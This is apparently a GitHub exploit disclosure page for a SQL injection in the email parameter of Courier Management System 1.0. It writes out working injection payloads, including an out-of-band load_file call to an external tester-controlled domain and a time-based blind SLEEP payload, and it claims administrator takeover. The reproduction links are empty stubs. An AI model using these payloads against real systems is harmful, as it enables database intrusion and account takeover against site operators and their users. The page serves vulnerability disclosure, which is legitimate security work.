Skip to content

Latest commit

 

History

History

Courier-Management-System

Folders and files

NameName
Last commit message
Last commit date

parent directory

..
 
 
 
 
 
 

Description:

The email parameter from Courier Management System 1.0 appears to be vulnerable to SQL injection attacks. The payload '+(select load_file('\\ipb60j3tyyqct2vn1oi9ox4it9z2ntix6o9c1zrng.nu11secur1tyPenetrationTestingEngineer.net\pcl'))+' was submitted in the email parameter. This payload injects a SQL sub-query that calls MySQL's load_file function with a UNC file path that references a URL on an external domain. The application interacted with that domain, indicating that the injected SQL query was executed. The application interacted with that domain, indicating that the injected SQL query was executed. The attacker can take administrator account control on this system. Status: CRITICAL

[+] Payloads:

---
Parameter: email (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: email=gEnNbsoi@burpcollaborator.net'+(select load_file('\\\\ipb60j3tyyqct2vn1oi9ox4it9z2ntix6o9c1zrng.nu11secur1tyPenetrationTestingEngineer.net\\pcl'))+'' AND (SELECT 2572 FROM (SELECT(SLEEP(3)))CpLw) AND 'MmOU'='MmOU&password=m1T!v9o!U7
---

Reproduce:

href

Proof and Exploit:

href